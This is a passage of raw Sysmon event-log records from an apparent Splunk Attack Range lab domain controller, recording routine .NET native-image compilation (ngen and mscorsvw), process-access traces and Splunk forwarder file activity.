Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022441Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.890{4DB9351A-A26B-60D3-1505-00000000CF01}4904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\93MD4N43UG\Microsoft.VisualBasic.ni.dll.auxMD5=9DE7C1ACE8645912560166BC2D7B7920,SHA256=82A8B083657234F4620D1C3D04A8C52C096E5B28A0A83955495EF106A9C2AEF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022440Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.890{4DB9351A-A26B-60D3-1505-00000000CF01}4904NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\93MD4N43UG\Microsoft.VisualBasic.ni.dllMD5=84B53D687A439A0883C25E7603AFC1D3,SHA256=350FBD904B2703B0843684A2D157459DEF0F0F2315CB395D1303965F2CC9B5CC,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022439Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.749{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022438Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022437Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1505-00000000CF01}4904C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022436Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-A26B-60D3-1405-00000000CF01}512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NE0IE2N4YC\Accessibility.ni.dll.auxMD5=084445535601300C3CBA320815E1F945,SHA256=89F9FE654030D2A90B6DA6F253A1E394BBD1FEB84DD760B56AB12BB781F97325,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022435Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.721{4DB9351A-A26B-60D3-1405-00000000CF01}512NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\NE0IE2N4YC\Accessibility.ni.dllMD5=15D4B1639EFC41ADC6FCE822A6B17557,SHA256=D463452A95FD5881FDA19FA812DB00DB1DF6FB7844F93FF75E12AE1718B8396E,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.686{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1405-00000000CF01}512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022431Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-A26B-60D3-1305-00000000CF01}6920NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31WSY5D7S2\System.Management.ni.dll.auxMD5=EDC2DFADA8B50C834AF7E8CCDF2E019A,SHA256=237E1EB1F2296CEA681784D2898E58D02FE826CDE0BAA6A5F32B9608BDF707D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022430Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.671{4DB9351A-A26B-60D3-1305-00000000CF01}6920NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\31WSY5D7S2\System.Management.ni.dllMD5=32A6B52926FA527DD4F61BA7F6F2E45A,SHA256=66C28B044A5753F6D78CF8A1BCAF026EF9E5BCE605380117FEE17D3BD3CD0750,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022429Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.593{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=693D4354D8424189ACAF5EA78F949537,SHA256=F6437775CAD21B2B343F1B525EFBD4728268900E72883443ADC858D966B9EA36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022428Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.530{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022427Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.499{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022426Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.499{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1305-00000000CF01}6920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022425Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.483{4DB9351A-A26B-60D3-1205-00000000CF01}3332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VUECGYFUE\System.ServiceProcess.ni.dll.auxMD5=D4AE2E57B736A6E69B3AD3331661A700,SHA256=D7076448A737664A250EA9ADCF9866EDCB84C427426EA5B5F10152D9D412CEE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022424Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.483{4DB9351A-A26B-60D3-1205-00000000CF01}3332NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0VUECGYFUE\System.ServiceProcess.ni.dllMD5=1E765A3E29AC66C0B8A47DC930FD5574,SHA256=90D5D1B4D026521288075AD7DC938C37E27877D1DAEF1B789E000D1F6664625C,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022423Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.452{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022422Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022421Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1205-00000000CF01}3332C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022420Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A26B-60D3-1105-00000000CF01}6848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ISHGW9W7FM\System.Runtime.Remoting.ni.dll.auxMD5=8E34B2EEE11D21650BC0D7343572310B,SHA256=90F40FDF9C0E89EB7FF891CB60EE0B068E94D324DC2A6FDA6324BEBA0184AA06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022419Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.405{4DB9351A-A26B-60D3-1105-00000000CF01}6848NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ISHGW9W7FM\System.Runtime.Remoting.ni.dllMD5=665A3841AA03F9AF9E8F96D346E65565,SHA256=85879FD01DC356F9B0C4BE799673C6C6290689CA11FA9FB0248814FC9AFDA9CF,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022418Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.362{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022417Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022416Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A26B-60D3-1105-00000000CF01}6848C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022415Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A26A-60D3-1005-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QJ40NM0T23\System.Windows.Forms.ni.dll.auxMD5=461203907E8693D5B93D7BFA570B19B7,SHA256=651F7F4AB3EAFCAF9C7757EFD99F3B962310FF3E8F0A5D98EF36409F2F62DBB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022414Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.327{4DB9351A-A26A-60D3-1005-00000000CF01}3752NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QJ40NM0T23\System.Windows.Forms.ni.dllMD5=668E7D31E685A220F6D84F17AF62F851,SHA256=CFB4DD013E776D4A5868B72EDAAA25A537FC26564062A2E382C72287534FC289,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000022413Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:51.233{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC5DFBD2C41086F98B0FAA7026AC6206,SHA256=58AA3F631FDC24C65E75B3836067727D19922147A8690632F2F1601D0234C6E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000022504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A26C-60D3-2105-00000000CF01}5784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:52.983{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 